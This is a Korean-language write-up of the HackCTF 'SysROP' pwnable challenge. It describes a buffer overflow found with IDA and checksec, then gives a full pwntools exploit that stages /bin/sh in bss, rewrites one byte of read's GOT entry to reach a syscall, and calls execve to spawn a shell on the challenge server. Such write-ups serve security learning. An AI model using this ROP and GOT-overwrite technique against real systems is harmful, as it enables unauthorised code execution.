HACKCTF - SysROP

 

문제 화면

 

 

 

문제 자체에서 sysrop라고 알려주었으니 저쪽으로 방향 맞춰서 진행해보겠습니다.

 

먼저 실행해보면

 

 

실행화면

 

입력받고 끝내네요..

 

ida로 확인해보면

 

ida main

 

read함수로 하나 입력받고, 바로 종료하는군요.

 

ida 

 

정말 건질 수 있는게 read함수밖에 없어보입니다.

문제 이름처럼 sysrop를 활용해서 문제를 풀어줬습니다.

 

checksec

 

main함수에서 발생하는 BOF를 이용해서 sysrop를 해줘야겠네요.

 

1. bss <-- binsh

2. read_got을 execve 주소로 1byte변환

3. execve 에서 bss불러와서 shell 획득

 

페이로드는 아래와 같습니다.

 

 

 

from pwn import *
 
r = remote("ctf.j0n9hyun.xyz",3024)
#r = process("./sysrop")
e = ELF("./sysrop")
l = ELF("./libc.so.6")
context.log_level = "debug"
 
 
 
shell = "/bin/sh\x00"
read_got = e.got['read']
read_plt = e.plt['read']
main = 0x4005F2
bss_add = 0x0000000000601048 # bss + 0x8
ppppr = 0x00000000004005ea # pop rax ; pop rdx ; pop rdi ; pop rsi ; ret
pppr = 0x00000000004005eb # pop rdx ; pop rdi ; pop rsi ; ret
 
 
pause()
 
#binsh --> bss
payload = ""
payload += "A"*0x18
payload += p64(pppr)
payload += p64(len(shell))
payload += p64(0)
payload += p64(bss_add)
payload += p64(read_plt)
payload += p64(main)
 
 
r.send(payload)
sleep(1)
r.send(shell)
sleep(1)
 
#read_got --> execve
payload = ""
payload += "A"*0x18
payload += p64(pppr)
payload += p64(1)
payload += p64(0)
payload += p64(read_got)
payload += p64(read_plt)
 
#make execve to excutee shell
payload += p64(ppppr)
payload += p64(59)
payload += p64(0)
payload += p64(bss_add)
payload += p64(0)
payload += p64(read_plt)
 
r.send(payload)
sleep(1)
r.send("\x5e")
sleep(1)
 
r.interactive()